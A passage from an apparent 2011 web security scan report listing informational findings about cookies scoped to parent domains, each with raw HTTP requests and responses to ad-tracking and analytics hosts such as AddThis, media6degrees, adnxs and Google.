GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dcbc94ff9bf6231&callback=_ate.ad.hrr&pub=y2kesq&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1ca2uh6 HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 12 May 2011 11:49:36 GMT
Set-Cookie: di=1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11-Jun-2011 11:49:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Thu, 12 May 2011 11:49:35 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

13.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=7164347 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1; IXAIBanners2579=178140,178140,178140,178140,178140; IXAIBannerCounter178140=5; IXAILastHit2579=5%2f11%2f2011+10%3a28%3a40+AM; IXAICampaignCounter2579=5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 10
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2554=175183,175237; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter175237=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2554=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 12 May 2011 11:39:23 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:39:23 GMT
Connection: close
Cache-Control: no-store



13.37. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.pomerantzlaw.com%2fattorneys.html HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0qo9c0053n010k02504; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r034smk6127p10024nnav218e2022062032107238ca131p10d2; acs=014020a0g0h1lkaebsxzt1qo9cxzt1qo9cxzt1p28s; rdrlst=4031194lkmm960cube0033n0110rdll12l4000000013n010znmlkmhha000000043n01; sglst=20e0s9ullkzgkk000000023n010k02502arrll12l4000000013n010k01501ag2lkmm960egby0033n010k025039rylkmhha0cz3a0023f000j00500a6slkzgkk000000023n010k02502bnzlkmhha0el3u0043n010k02504cgzlkmhha0cz3a0043n010k025040tilkmhha0el3u0043n010k025040klll12l4000000013n010k01501a6rlkmhha0cz3a0023f000j00500dlell12l4000000013n010k01501abflkmhha0cz3a0023f000j00500dg4lkmhha0cz3a0043n010k02504943lkzgkk01m0k0023n010k02502

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1lkaebsxzt1sl6yxzt1sl6yxzt1p28s; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6y0063o010k03505; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2ziq000000013o01; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Thu, 12 May 2011 11:49:38 GMT


13.38. http://da.newstogram.com/hg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:35 GMT; domain=.newstogram.com
Content-Length: 122

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

13.39. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:57 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:57 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

13.40. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 318
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:36 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:36 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2
...[SNIP]...

13.41. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D0%26pop_nofreqcap%3D1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 12:02:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb757416=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1
Date: Thu, 12 May 2011 12:02:00 GMT
Content-Length: 0


13.42. http://id.google.com/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TPG+Capital
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=ShaN536VX1BT-W8jSCkNsB7UCdsHHBFwvL-fv0GuHA=AXsz92cQ6dNvC4Zp; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=8speeaESqyhrMgr9xX2f3dfNmJleRrlferTqXy3eJg=hbrRwBcbVI4mN8f5; expires=Fri, 11-Nov-2011 11:16:11 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:16:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.43. http://id.google.com/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Greycroft+Partners&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=46=c4G1Ph4cKUL8vIy3rVGhga3EddhyprGFvKsEDbub=jlSNKhZPzqryPL-6; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; expires=Fri, 11-Nov-2011 11:28:26 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:28:26 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.44. http://id.google.com/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Kosmix&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ; expires=Fri, 11-Nov-2011 11:28:36 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:28:36 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.45. http://id.google.com/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Apollo+Global+Management
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=8speeaESqyhrMgr9xX2f3dfNmJleRrlferTqXy3eJg=hbrRwBcbVI4mN8f5; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=oTq4LnZEtdzKn7HNkb_Dta4Yn3_Wet9JeZqzzEO8WMho4oIfjoY99NXlJgtddLMrACItPbQPwVVZ_ffM733pwCwWO_lawUxZaY9bvbdTU3Wgu9sMqoN9ZaLEeF7qUu7D; expires=Fri, 11-Nov-2011 11:38:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:38:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.46. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1 HTTP/1.1
Host: idpix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
